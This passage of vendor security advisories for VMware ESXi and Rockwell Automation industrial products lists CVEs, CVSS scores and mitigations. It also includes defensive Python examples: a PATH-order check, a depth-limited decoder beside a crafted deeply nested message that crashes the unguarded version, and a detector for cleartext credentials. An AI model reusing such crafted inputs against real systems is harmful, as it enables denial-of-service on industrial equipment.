A Time-of-Check Time-of-Use (TOCTOU) vulnerability exists in VMware ESXi, which the affected products use. Exploitation of the vulnerability can allow a threat actor with local administrative privileges to execute code as the virtual machine's VMX process running on the host.

CVSS 3.1 Base Score: 9.3
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.4
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Known Exploited Vulnerability (KEV) database: Yes

 

CVE-2025-22225

A code execution vulnerability exists in VMware ESXi, which the affected products use. Exploitation of the vulnerability can allow a threat actor with privileges within the VMX process to trigger an arbitrary kernel write, leading to an escape of the sandbox.

CVSS 3.1 Base Score: 8.2
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Known Exploited Vulnerability (KEV) database: Yes

 

CVE-2025-22226

An out-of-bounds vulnerability exists in VMware ESXi, which the affected products use. Exploitation of the vulnerability can allow a threat actor with administrative privileges to leak memory from the VMX process.

CVSS 3.1 Base Score: 7.1
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CVSS 4.0 Base Score: 8.2
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: Yes

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.    

 

Critical
SD1721 | FactoryTalk® AssetCentre Multiple Vulnerabilities
Published Date: January 29, 2025
Last Updated: January 29, 2025
CVE IDs: CVE-2025-0477, CVE-2025-0497, CVE-2025-0498
CVSS Scores (v3.1): 9.8, 7.0, 7.8
CVSS Scores (v4.0): 9.3, 7.3, 7.0
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: Yes

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | Affected Versions | Corrected Version
-----------------|-----|-------------------|------------------
FactoryTalk® AssetCentre | CVE-2025-0477 | All prior to V15.00.001 | V15.00.01 and later
FactoryTalk® AssetCentre | CVE-2025-0497 | V11, V12, and V13 (patch available) | V15.00.01 and later
FactoryTalk® AssetCentre | CVE-2025-0498 | V11, V12, and V13 (patch available) | V15.00.01 and later

 

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

For CVE-2025-0477:

  • Update FactoryTalk® AssetCentre to v15.00.01 or later.
  • The encrypted data is stored in a table in the database. Control access to the database by non-essential users.

For CVE-2025-0497:

  • Update FactoryTalk® AssetCentre to v15.00.01 or later.
  • Apply patches to correct legacy versions:
      - To apply the patch for LogCleanUp or ArchiveLogCleanUp, download and install the Rockwell Automation January 2025 Monthly Patch rollup, or later.
      - To apply patches for EventLogAttachmentExtractor or ArchiveExtractor, locate the article BF31148, download the patch files and follow the instructions.
  • Restrict physical access to the machine to authorized users.

For CVE-2025-0498:

  • Update FactoryTalk® AssetCentre to v15.00.01 or later.
  • Apply patches to correct legacy versions:
      - To apply the patch for download and install the Rockwell Automation January 2025 Monthly Patch rollup, or later
  • Restrict physical access to the machine to authorized users.

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

VULNERABILITY DETAILS

CVE-2025-0477 and CVE-2025-0497 were reported to Rockwell Automation by Alban Avdiji of Nestlé. CVE-2025-0498 was found internally by Rockwell Automation during routine testing. Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-0477 IMPACT

An encryption vulnerability exists in all versions prior to V15.00.001 of FactoryTalk® AssetCentre. The vulnerability exists due to a weak encryption methodology and could allow a threat actor to extract passwords belonging to other users of the application.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-326: Inadequate Encryption Strength
Known Exploited Vulnerability (KEV) database: No

CVE-2025-0497 IMPACT

A data exposure vulnerability exists in all versions prior to V15.00.001 of FactoryTalk® AssetCentre. The vulnerability exists due to storing credentials in the configuration file of EventLogAttachmentExtractor, ArchiveExtractor, LogCleanUp, or ArchiveLogCleanUp packages.

CVSS 3.1 Base Score: 7.0
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.3
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-522: Insufficiently Protected Credentials
Known Exploited Vulnerability (KEV) database: No

CVE-2025-0498 IMPACT

A data exposure vulnerability exists in all versions prior to V15.00.001 of FactoryTalk® AssetCentre. The vulnerability exists due to insecure storage of FactoryTalk® Security user tokens, which could allow a threat actor to steal a token and impersonate another user.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.0
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-522: Insufficiently Protected Credentials
Known Exploited Vulnerability (KEV) database: No

Critical
SD1715 | Path Traversal and Third-party Vulnerability in DataMosaix™ Private Cloud
Published Date:
January 28, 2025
Last Updated:
January 28, 2025
CVE IDs:
CVE-2025-0659, CVE-2020-11656
CVSS Scores (v3.1):
5.5, 9.8
CVSS Scores (v4.0):
7.0, 9.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | Affected Software Version | Corrected in Software Version
DataEdgePlatform DataMosaix™ Private Cloud | CVE-2025-0659 | <=7.11 | 7.11.01
DataEdgePlatform DataMosaix™ Private Cloud | CVE-2020-11656 | <=7.09 | 7.11.01

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

 CVE-2025-0659 IMPACT

A path traversal vulnerability exists in the affected product. By specifying a traversal character sequence in the body of a request to the vulnerable endpoint, it is possible to overwrite files outside the intended directory. A threat actor with admin privileges could leverage this vulnerability to overwrite reports, including user projects.

CVSS 3.1 Base Score: 5.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N

CVSS 4.0 Base Score: 7.0
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N

CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
Known Exploited Vulnerability (KEV) database: No

CVE-2020-11656 IMPACT

The affected product uses a version of SQLite that contains a use-after-free in the ALTER TABLE implementation, demonstrated by an ORDER BY clause belonging to a compound SELECT statement.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-1395: Dependency on Vulnerable Third-Party Component
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

High
SD1718 | 5380/5580 Denial-of-Service Vulnerability
Published Date:
January 28, 2025
Last Updated:
January 30, 2025
CVE IDs:
CVE-2025-24478
CVSS Scores (v3.1):
6.5
CVSS Scores (v4.0):
7.1
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

AFFECTED PRODUCTS AND SOLUTION

Affected Product(s) | First Known in Software Version | Corrected in Software Version
GuardLogix 5580 | V33.011 | V33.017, V34.014, V35.013, V36.011 and later
Compact GuardLogix 5380 SIL3 | V33.011 | V33.017, V34.014, V35.013, V36.011 and later

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-24478 IMPACT

A denial-of-service vulnerability exists in the affected products. A remote, low-privileged user could send malicious requests that cause a major nonrecoverable fault, resulting in denial of service.

CVSS 3.1 Base Score: 6.5
CVSS 3.1 Vector:  CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 7.1
CVSS 4.0 Vector:  CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: CWE-755: Improper Handling of Exceptional Conditions
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·         Restrict access to the task object via CIP Security, and run the controller with the mode switch in the RUN position (hard run).

·         For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Critical
SD1719 | FactoryTalk® View Machine Edition Multiple Vulnerabilities
Published Date:
January 28, 2025
Last Updated:
February 05, 2025
CVE IDs:
CVE-2025-24479, CVE-2025-24480
CVSS Scores (v3.1):
8.4, 9.8
CVSS Scores (v4.0):
8.6, 9.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | Affected Version(s) | Corrected in Software Version
FactoryTalk® View Machine Edition | CVE-2025-24479 | < V15 | V15 and patch for V12, V13, V14 (AID 1152309)
FactoryTalk® View Machine Edition | CVE-2025-24480 | < V15 | V15 and patch for V12, V13, V14 (AID 1152571)

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-24479 IMPACT

A local code execution vulnerability exists in the product and versions listed above. The vulnerability is due to a default setting in Windows and allows access to the Command Prompt as a higher-privileged user.

CVSS 3.1 Base Score: 8.4
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.6
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-863: Incorrect Authorization
Known Exploited Vulnerability (KEV) database: No

CVE-2025-24480 IMPACT

A remote code execution vulnerability exists in the product and versions listed above. The vulnerability is due to a lack of input sanitization and could allow a remote attacker to run commands or code as a highly privileged user.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') & CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·         CVE-2025-24479:
          ·   Upgrade to V15.00 or apply the patch in AID 1152309.
          ·   Control physical access to the system.

·         CVE-2025-24480:
          ·   Upgrade to V15.00 or apply the patch in AID 1152571.
          ·   Protect network access to the device.
          ·   Strictly constrain the parameters of invoked functions.

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

High
SD1720 | FactoryTalk® View Site Edition Multiple Vulnerabilities
Published Date:
January 28, 2025
Last Updated:
January 28, 2025
CVE IDs:
CVE-2025-24481, CVE-2025-24482
CVSS Scores (v3.1):
7.3
CVSS Scores (v4.0):
7.0
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | Affected Version(s) | Corrected in Software Version
FactoryTalk® View SE | CVE-2025-24481 | < V15.0 | V15.0, and patch for V14 (AID 1152306)
FactoryTalk® View SE | CVE-2025-24482 | < V15.0 | V15.0, and patches for V12, V13, V14 (AID 1152304)

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-24481 IMPACT

An Incorrect Permission Assignment Vulnerability exists in the product and version listed above. The vulnerability is due to incorrect permissions being assigned to the remote debugger port and can allow for unauthenticated access to the system configuration.

CVSS 3.1 Base Score: 7.3
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

CVSS 4.0 Base Score: 7.0
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N

CWE-732:  Incorrect Permission Assignment for Critical Resource
Known Exploited Vulnerability (KEV) database: No

CVE-2025-24482 IMPACT

A local code injection vulnerability exists in the product and versions listed above. The vulnerability is due to incorrect default permissions and allows DLLs to be loaded and executed with higher-level permissions.

CVSS 3.1 Base Score: 7.3
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

CVSS 4.0 Base Score: 7.0
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N

CWE-94: Improper Control of Generation of Code ('Code Injection')
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·         For CVE-2025-24481:
          ·   Upgrade to V15 or apply the patch in Answer ID 1152306.
          ·   Protect physical access to the workstation.
          ·   Restrict access to port 8091 at the network or on the workstation.

·         For CVE-2025-24482:
          ·   Upgrade to V15 or apply the patch in Answer ID 1152304.
          ·   Check the PATH environment variable and make sure the FactoryTalk® View SE installation path (C:\Program Files (x86)\Common Files\Rockwell) appears before all other entries.
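The PATH check in the CVE-2025-24482 mitigation is easy to get wrong by hand: Windows compares entries case-insensitively, and trailing backslashes or quotes around an entry are cosmetic. The helper below is an added example for this page, not Rockwell Automation tooling; it applies Windows path rules to a PATH string so the check, and a corrected ordering, can be produced from an exported value. The sample PATH is constructed; the Rockwell directory is the one the advisory names.

```python
"""PATH precedence check for the CVE-2025-24482 mitigation (added example;
not vendor code). Works on a PATH string so it can be run offline against an
exported value as well as against os.environ["PATH"] on the workstation."""
import ntpath  # Windows path rules regardless of the host this runs on

# Directory named in the advisory that must precede every other PATH entry
REQUIRED_DIR = r"C:\Program Files (x86)\Common Files\Rockwell"


def _norm(entry: str) -> str:
    """Canonical form for comparison: strip quotes, drop trailing separators,
    fold case. Unexpanded variables such as %SystemRoot% are compared literally."""
    return ntpath.normcase(ntpath.normpath(entry.strip().strip('"')))


def split_path(path: str) -> list:
    """PATH entries in search order, empty entries dropped."""
    return [e for e in path.split(";") if e.strip()]


def entries_ahead_of(path: str, required: str = REQUIRED_DIR) -> list:
    """Return the entries Windows would search before `required`
    ([] when it is first). Raises ValueError when it is absent entirely."""
    entries = split_path(path)
    target = _norm(required)
    for i, entry in enumerate(entries):
        if _norm(entry) == target:
            return entries[:i]
    raise ValueError(f"{required} is not on PATH")


def is_compliant(path: str, required: str = REQUIRED_DIR) -> bool:
    """True only when `required` is present and searched first."""
    try:
        return entries_ahead_of(path, required) == []
    except ValueError:
        return False


def reorder_path(path: str, required: str = REQUIRED_DIR) -> str:
    """PATH with `required` moved to the front (added if missing); other entries
    keep their relative order and duplicate copies of `required` are dropped."""
    target = _norm(required)
    rest = [e for e in split_path(path) if _norm(e) != target]
    return ";".join([required] + rest)


# Constructed sample: the Rockwell directory is present but searched third.
SAMPLE_PATH = (r"C:\Windows\system32;C:\Windows;"
               r"C:\Program Files (x86)\Common Files\Rockwell\;C:\Tools")

if __name__ == "__main__":
    print("compliant:", is_compliant(SAMPLE_PATH))
    print("searched first:", entries_ahead_of(SAMPLE_PATH))
    print("corrected:", reorder_path(SAMPLE_PATH))
```

On the affected workstation the same functions can be run against the live value; if reorder_path changes the string, the installation path was not first. Reordering only narrows the window in which a same-named DLL planted in an earlier directory would be found first, so the patch or the upgrade to V15 still applies.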

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

High
SD1716 | KEPServer Denial-of-Service Vulnerability Found During Pwn2Own Competition
Published Date:
January 28, 2025
Last Updated:
January 28, 2025
CVE IDs:
CVE-2023-3825
Products:
KEPServer
CVSS Scores (v3.1):
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | Affected Versions | Fixed Version
KEPServer | CVE-2023-3825 | 6.0 - 6.14.263 | 6.15

VULNERABILITY DETAILS

Rockwell Automation received a report from PTC, a strategic partner of Rockwell Automation, regarding this vulnerability, which was discovered by security researchers from Claroty Team82 during the Pwn2Own competition hosted by Trend Micro's Zero Day Initiative (ZDI). Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerability.

CVE-2023-3825 IMPACT

KEPServerEX versions 6.0 to 6.14.263 can be made to read a recursively defined object, leading to uncontrolled resource consumption. KEPServerEX uses OPC UA, a protocol that defines object types which can be nested to create complex arrays. The decoder does not check whether such an object is recursively defined, so an attacker could send a maliciously crafted message that the decoder would try to decode until the stack overflowed and the device crashed.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-400: Uncontrolled Resource Consumption
Known Exploited Vulnerability (KEV) database: No
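The failure mode above, a decoder that recurses once per nesting level until the native stack is exhausted, is general to any recursive decoder for a self-nesting format. The toy decoder below is an added example for this page, not KEPServerEX code and not the OPC UA binary encoding; its two-tag format, its depth limit of 32 and the messages it builds are constructed for the example. It shows the unguarded decoder beside a guarded one that caps nesting depth and refuses array counts the buffer cannot hold.

```python
"""Nesting-depth guard for a recursive decoder (added example; toy format,
not OPC UA and not vendor code). Constructed encoding:
    0x01 <int32 LE>                         integer
    0x02 <int32 LE count> <count values>    array of values (may nest)
"""
import struct

TAG_INT32 = 0x01
TAG_ARRAY = 0x02
MAX_DEPTH = 32  # assumed limit for the example; real stacks choose their own


def encode_nested(depth: int, leaf: int = 42) -> bytes:
    """Wrap one integer in `depth` single-element arrays (built in O(depth))."""
    one_element_array = bytes([TAG_ARRAY]) + struct.pack("<i", 1)
    return one_element_array * depth + bytes([TAG_INT32]) + struct.pack("<i", leaf)


def decode_unbounded(buf: bytes, pos: int = 0):
    """The vulnerable pattern: recursion depth is whatever the sender chose."""
    tag = buf[pos]
    if tag == TAG_INT32:
        return struct.unpack_from("<i", buf, pos + 1)[0], pos + 5
    if tag == TAG_ARRAY:
        (count,) = struct.unpack_from("<i", buf, pos + 1)  # trusted as-is
        pos += 5
        items = []
        for _ in range(count):
            item, pos = decode_unbounded(buf, pos)
            items.append(item)
        return items, pos
    raise ValueError(f"unknown tag {tag:#04x}")


def decode_bounded(buf: bytes, pos: int = 0, depth: int = 0,
                   max_depth: int = MAX_DEPTH):
    """Hardened: bounded nesting, every read length-checked, and array counts
    validated against the bytes actually present before any work is done."""
    if depth > max_depth:
        raise ValueError(f"nesting deeper than {max_depth} levels")
    if pos + 5 > len(buf):
        raise ValueError("truncated message")
    tag = buf[pos]
    (n,) = struct.unpack_from("<i", buf, pos + 1)
    pos += 5
    if tag == TAG_INT32:
        return n, pos
    if tag == TAG_ARRAY:
        # Every element occupies at least 5 bytes, so a count the remaining
        # buffer cannot hold is a lie and must not size any list or loop.
        if n < 0 or n > (len(buf) - pos) // 5:
            raise ValueError(f"array count {n} exceeds remaining {len(buf) - pos} bytes")
        items = []
        for _ in range(n):
            item, pos = decode_bounded(buf, pos, depth + 1, max_depth)
            items.append(item)
        return items, pos
    raise ValueError(f"unknown tag {tag:#04x}")


def decode_or_reject(buf: bytes, max_depth: int = MAX_DEPTH):
    """(value, None) on success, (None, reason) when the message is refused."""
    try:
        value, end = decode_bounded(buf, 0, 0, max_depth)
    except ValueError as exc:
        return None, str(exc)
    if end != len(buf):
        return None, f"{len(buf) - end} trailing bytes"
    return value, None


def unbounded_crashes(buf: bytes) -> bool:
    """True when the unguarded decoder exhausts the interpreter stack on `buf`,
    the Python analogue of the native stack overflow in the advisory."""
    try:
        decode_unbounded(buf)
        return False
    except RecursionError:
        return True


if __name__ == "__main__":
    hostile = encode_nested(5000)
    print("unguarded decoder crashes:", unbounded_crashes(hostile))
    print("guarded decoder says:", decode_or_reject(hostile)[1])
```

In Python the unguarded decoder dies with RecursionError rather than taking the process down; in native code the same input overruns the thread stack, which is the crash the advisory describes. The guarded decoder fails at a fixed, small depth, before any allocation sized by an attacker-controlled count, and reports why.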

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·         For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

·         NVD - CVE-2023-3825

·         PTC KEPServerEX | CISA

·         CS405439 - Security vulnerabilities identified in PTC Kepware products - November 2023

High
SD1717 | PowerFlex® 755 Credential Exposure Vulnerability
Published Date:
January 28, 2025
Last Updated:
January 28, 2025
CVE IDs:
CVE-2025-0631
Products:
PowerFlex 755
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Version(s) | Fixed Version
PowerFlex® 755 | <=16.002.279 | v20.3.407

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-0631 IMPACT

A credential exposure vulnerability exists in the above-mentioned product and versions. The vulnerability is due to the use of unencrypted HTTP, which results in credentials being sent in cleartext.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

CWE-319: Cleartext Transmission of Sensitive Information
Known Exploited Vulnerability (KEV) database: No
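A practitioner who wants to confirm whether a device's web login crosses the plant network in the clear can capture the traffic and look for the usual credential carriers. The detector below is an added example for this page, not Rockwell Automation code and not derived from the PowerFlex 755 firmware; the advisory says only that credentials travel over HTTP, so the two carriers it checks (HTTP Basic authentication and URL-encoded login forms), the field names it looks for, and the sample requests with their host and passwords are all constructed for the example.

```python
"""Cleartext-credential detector for captured HTTP requests (added example;
not vendor code). Records which carrier and which username were observed
without copying the password into the findings."""
import base64
from urllib.parse import parse_qs

# Assumed form field names; real products vary.
PASSWORD_FIELDS = {"password", "passwd", "pwd", "pass"}
USER_FIELDS = ("username", "user", "login")


def parse_http_request(raw: bytes) -> dict:
    """Minimal HTTP/1.x request parser: request line, headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target,
            "headers": headers, "body": body.decode("latin-1")}


def find_cleartext_credentials(raw: bytes) -> list:
    """Findings for one request: [] when no credential carrier is present."""
    req = parse_http_request(raw)
    findings = []

    auth = req["headers"].get("authorization", "")
    if auth.lower().startswith("basic "):
        try:
            decoded = base64.b64decode(auth[6:], validate=True).decode("latin-1")
            user = decoded.split(":", 1)[0]
        except ValueError:  # binascii.Error is a ValueError
            user = "<undecodable>"
        findings.append({"carrier": "basic-auth", "user": user,
                         "target": req["target"]})

    ctype = req["headers"].get("content-type", "")
    if req["method"] == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
        form = parse_qs(req["body"])
        if any(field in PASSWORD_FIELDS for field in form):
            user = next((form[f][0] for f in USER_FIELDS if f in form), "<unknown>")
            findings.append({"carrier": "form-post", "user": user,
                             "target": req["target"]})
    return findings


def scan_capture(requests) -> list:
    """Flatten findings over a sequence of captured requests."""
    return [f for raw in requests for f in find_cleartext_credentials(raw)]


# Constructed sample requests (host, users and passwords are invented).
SAMPLE_BASIC = (b"GET /index.html HTTP/1.1\r\nHost: 192.0.2.10\r\n"
                b"Authorization: Basic " + base64.b64encode(b"admin:drive123")
                + b"\r\n\r\n")
SAMPLE_FORM = (b"POST /login HTTP/1.1\r\nHost: 192.0.2.10\r\n"
               b"Content-Type: application/x-www-form-urlencoded\r\n"
               b"Content-Length: 33\r\n\r\n"
               b"username=operator&password=s3cret")
SAMPLE_CLEAN = b"GET /status HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n"

if __name__ == "__main__":
    for finding in scan_capture([SAMPLE_BASIC, SAMPLE_FORM, SAMPLE_CLEAN]):
        print(finding)
```

Run against a real capture (for example the payloads of TCP port 80 segments to the drive), a non-empty result is the observation the advisory describes; after the firmware update the same capture point should show only TLS records, which this parser will not recognise as HTTP at all.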

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·         For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Critical
SD1714 | PowerMonitor™ 1000 Remote Code Execution and denial-of-service Vulnerabilities via HTTP protocol
Published Date:
December 17, 2024
Last Updated:
December 17, 2024
CVE IDs:
CVE-2024-12371 , CVE-2024-12372 , CVE-2024-12373
CVSS Scores (v3.1):
9.8, 9.8, 9.8
CVSS Scores (v4.0):
9.3, 9.3, 9.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Revision Number: 1.0

AFFECTED PRODUCTS AND SOLUTION

Affected Products | Affected firmware revision | Corrected in firmware revision
PM1k 1408-BC3A-485 | <4.020 | 4.020
PM1k 1408-BC3A-ENT | <4.020 | 4.020
PM1k 1408-TS3A-485 | <4.020 | 4.020
PM1k 1408-TS3A-ENT | <4.020 | 4.020
PM1k 1408-EM3A-485 | <4.020 | 4.020
PM1k 1408-EM3A-ENT | <4.020 | 4.020
PM1k 1408-TR1A-485 | <4.020 | 4.020
PM1k 1408-TR2A-485 | <4.020 | 4.020
PM1k 1408-EM1A-485 | <4.020 | 4.020
PM1k 1408-EM2A-485 | <4.020 | 4.020
PM1k 1408-TR1A-ENT | <4.020 | 4.020
PM1k 1408-TR2A-ENT | <4.020 | 4.020
PM1k 1408-EM1A-ENT | <4.020 | 4.020
PM1k 1408-EM2A-ENT | <4.020 | 4.020

VULNERABILITY DETAILS

Rockwell Automation used versions 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities. The following vulnerabilities were reported by Vera Mens of Claroty Research - Team82.

 

CVE-2024-12371 IMPACT

A device takeover vulnerability exists in the affected product. It allows a new Policyholder user to be configured via the API without any authentication. The Policyholder user is the most privileged user: it can perform edit operations, create admin users and perform a factory reset.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-420: Unprotected Alternate Channel
Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-12372 IMPACT

A denial-of-service and possible remote code execution vulnerability exists in the affected product. The vulnerability results in corruption of the heap memory which may compromise the integrity of the system, potentially allowing for remote code execution or a denial-of-service attack.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-122: Heap-based Buffer Overflow
Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-12373 IMPACT

A denial-of-service vulnerability exists in the affected product. The vulnerability results in a buffer-overflow, potentially causing denial-of-service.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
